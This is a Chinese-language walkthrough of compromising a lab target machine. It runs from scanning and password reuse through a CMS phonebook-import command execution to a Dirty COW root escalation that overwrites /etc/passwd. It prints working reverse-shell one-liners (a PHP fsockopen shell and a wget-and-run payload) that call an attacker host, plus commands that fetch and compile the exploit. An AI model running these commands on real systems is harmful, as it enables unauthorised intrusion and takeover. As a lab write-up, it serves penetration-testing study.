挺有意思的一个靶机
目录
主机发现
netdiscover -i eth0 -r 192.168.129.0/24
端口扫描
扫描端口的服务版本,服务器操作系统,中间件等信息
目录扫描
去web端看看,开始渗透
看了看页面也没啥有用信息
一个提交信息
只是爆出服务器中间件版本然后也不能操作什么
还有一个链接跳转到了一个印度人的博客里,里面有他的漏洞发现过程,我们不看^-^
来访问一下目录扫描出来的结果
http://192.168.129.201/robots.txt
http://192.168.129.201/secure/
http://192.168.129.201/tmp/
http://192.168.129.201/uploads/
点了下发现点不进去,拖到新页面也没有啥
最后我将那个后缀去掉在访问 直接触发了下载
下来要解压,里面有一个 .mp3文件,但是要解压密码,先放着
robots.txt里的几个也都进去后没发现什么
然后换了个kali2021的dirb
最后发现这里有些信息
好像是什么密码之类的,但是也还没有找到啥子登录框
现在只剩那个下载的加密文件了
刚好这里爆出了几个密码,去试试
freedom password helloworld! diana iloveroot
结果第一个就成功了
编辑打开里面的.mp3 文件,找到了一些内容
访问一下这个url,看名字像是个登陆点
直接跳转过来了
里面那句话,这个人设的密码应该是弱口令
来用.mp3 里的uname登陆下,密码使用那个网页找到的那几个
freedom password helloworld! diana iloveroot
然后使用diana登陆上来了
随便点了几下,发现这里有几个下载
结果啥也不是,浪费流量
然后在这发现了一个上传点
然后上传了一个图片马,不知道上传到哪里了
这时想到了能不能去搜一下这个cms有什么版本漏洞
看见这个 42044 里有远程命令执行漏洞
查看
让插入代码到电话簿里
想到了刚才下的几个空文件,有个phonebook,直接有格式了
直接改它
改好后import进去
同时抓包
在user-agent里执行命令,,命令执行成功
反弹shell
方法1
在kali下做如下准备
&3 2>&3") ?>
再监听1234
远程执行如下代码
wget 192.168.129.197/shell.txt -O /tmp/shell.php;php /tmp/shell.php
getshell
方法2
php -r '$sock=fsockopen("192.168.129.197",1234);exec("/bin/sh -i &3 2>&3");'
getshell
提权
尝试1-失败
查看内核版本
搜索操作系统版本漏洞
本地提权
复制到网站根目录
远程下载,编译,执行
结果失败了
尝试2-脏牛提权-成功
下载,编译,执行
wget http://192.168.129.197/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty root (root是随便给个密码,一会自己用)
然后登陆自己的用户,此时,这个用户已经是管理员了
用python开一个新窗口
登陆成功,#
看,以前的root已经被覆盖掉了
渗透完成后,要恢复
mv /tmp/passwd.bak /etc/passwd
明显不一样了,,只是前一个用户也叫firefart,,密码恢复为他的了
得到flag